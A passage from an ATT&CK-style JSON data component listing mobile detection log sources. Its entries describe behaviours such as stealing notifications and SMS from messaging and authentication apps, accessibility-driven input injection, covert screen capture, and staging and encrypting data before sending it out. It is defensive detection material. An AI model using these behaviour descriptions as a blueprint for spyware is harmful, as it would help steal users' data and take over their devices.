                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of Calendar.set() and Calendar.add()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Invocation of AccountManager.getAccounts()"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:22:40.476000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][69]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)\"}, \"root['x_mitre_log_sources'][70]\": {\"name\": \"android:logcat\", \"channel\": \"SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID\"}, \"root['x_mitre_log_sources'][71]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}, \"root['x_mitre_log_sources'][72]\": {\"name\": \"android:logcat\", \"channel\": \"QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads\"}, \"root['x_mitre_log_sources'][73]\": {\"name\": \"android:logcat\", \"channel\": \"ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>\"}, \"root['x_mitre_log_sources'][74]\": {\"name\": \"android:logcat\", \"channel\": \"AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages\"}, \"root['x_mitre_log_sources'][75]\": {\"name\": \"android:logcat\", \"channel\": \"TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground\"}, \"root['x_mitre_log_sources'][76]\": {\"name\": \"android:logcat\", \"channel\": \"PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>\"}, \"root['x_mitre_log_sources'][77]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes\"}, \"root['x_mitre_log_sources'][78]\": {\"name\": \"android:logcat\", \"channel\": \"getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks\"}, \"root['x_mitre_log_sources'][79]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors\"}, \"root['x_mitre_log_sources'][80]\": {\"name\": \"android:logcat\", \"channel\": \"ACTION_VIEW redirect_uri handled by unexpected package\"}, \"root['x_mitre_log_sources'][81]\": {\"name\": \"android:logcat\", \"channel\": \"canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri\"}, \"root['x_mitre_log_sources'][82]\": {\"name\": \"android:logcat\", \"channel\": \"query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)\"}, \"root['x_mitre_log_sources'][83]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers\"}, \"root['x_mitre_log_sources'][84]\": {\"name\": \"android:logcat\", \"channel\": \"wifiservice startScan / scanResults retrieved repeatedly or by unexpected package\"}, \"root['x_mitre_log_sources'][85]\": {\"name\": \"android:logcat\", \"channel\": \"bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package\"}, \"root['x_mitre_log_sources'][86]\": {\"name\": \"android:logcat\", \"channel\": \"telephony cell info enumeration bursts (neighboring/all cell info) by package\"}, \"root['x_mitre_log_sources'][87]\": {\"name\": \"android:logcat\", \"channel\": \"repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)\"}, \"root['x_mitre_log_sources'][88]\": {\"name\": \"android:logcat\", \"channel\": \"Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)\"}, \"root['x_mitre_log_sources'][89]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application invokes UIDevice queries (model, systemVersion, name)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls\"}, \"root['x_mitre_log_sources'][92]\": {\"name\": \"android:logcat\", \"channel\": \"Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application activates CoreLocation services or CLLocationManager APIs\"}, \"root['x_mitre_log_sources'][94]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction\"}, \"root['x_mitre_log_sources'][95]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')\"}, \"root['x_mitre_log_sources'][96]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access\"}, \"root['x_mitre_log_sources'][99]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions\"}, \"root['x_mitre_log_sources'][100]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use\"}, \"root['x_mitre_log_sources'][101]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation\"}, \"root['x_mitre_log_sources'][102]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install\"}, \"root['x_mitre_log_sources'][104]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update\"}, \"root['x_mitre_log_sources'][105]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image\"}, \"root['x_mitre_log_sources'][106]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of Calendar.set() and Calendar.add()\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication\"}, \"root['x_mitre_log_sources'][111]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device\"}, \"root['x_mitre_log_sources'][112]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow\"}, \"root['x_mitre_log_sources'][113]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence\"}, \"root['x_mitre_log_sources'][114]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][115]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][116]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_sources'][117]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of CallLogs.getLastOutgoingCall()\"}, \"root['x_mitre_log_sources'][118]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()\"}, \"root['x_mitre_log_sources'][119]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context\"}, \"root['x_mitre_log_sources'][120]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of AccountManager.getAccounts()\"}, \"root['x_mitre_log_sources'][121]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow\"}, \"root['x_mitre_log_sources'][122]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow\"}, \"root['x_mitre_log_sources'][123]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active\"}, \"root['x_mitre_log_sources'][124]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow\"}, \"root['x_mitre_log_sources'][125]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow\"}, \"root['x_mitre_log_sources'][126]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship\"}, \"root['x_mitre_log_sources'][127]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction\"}, \"root['x_mitre_log_sources'][128]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows\"}, \"root['x_mitre_log_sources'][129]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers\"}, \"root['x_mitre_log_sources'][130]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage\"}, \"root['x_mitre_log_sources'][131]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers\"}, \"root['x_mitre_log_sources'][132]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Keypair generation, import, or access events (public/private key usage) occurring prior to network communication\"}, \"root['x_mitre_log_sources'][133]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment\"}, \"root['x_mitre_log_sources'][134]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain\"}, \"root['x_mitre_log_sources'][135]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer\"}, \"root['x_mitre_log_sources'][136]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload\"}, \"root['x_mitre_log_sources'][137]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase\"}, \"root['x_mitre_log_sources'][138]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission\"}, \"root['x_mitre_log_sources'][139]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain\"}, \"root['x_mitre_log_sources'][140]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment\"}, \"root['x_mitre_log_sources'][141]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation\"}, \"root['x_mitre_log_sources'][142]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase\"}, \"root['x_mitre_log_sources'][143]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase\"}, \"root['x_mitre_log_sources'][144]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase\"}, \"root['x_mitre_log_sources'][145]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase\"}, \"root['x_mitre_log_sources'][146]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase\"}, \"root['x_mitre_log_sources'][147]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases\"}, \"root['x_mitre_log_sources'][148]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase\"}, \"root['x_mitre_log_sources'][149]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase\"}, \"root['x_mitre_log_sources'][150]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior\"}, \"root['x_mitre_log_sources'][151]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase\"}, \"root['x_mitre_log_sources'][152]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events\"}, \"root['x_mitre_log_sources'][153]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application launches or executes code where loaded library or component path does not match application package path or expected signing context\"}, \"root['x_mitre_log_sources'][154]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval\"}, \"root['x_mitre_log_sources'][155]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed\"}, \"root['x_mitre_log_sources'][159]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match\"}, \"root['x_mitre_log_sources'][160]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition\"}, \"root['x_mitre_log_sources'][161]\": 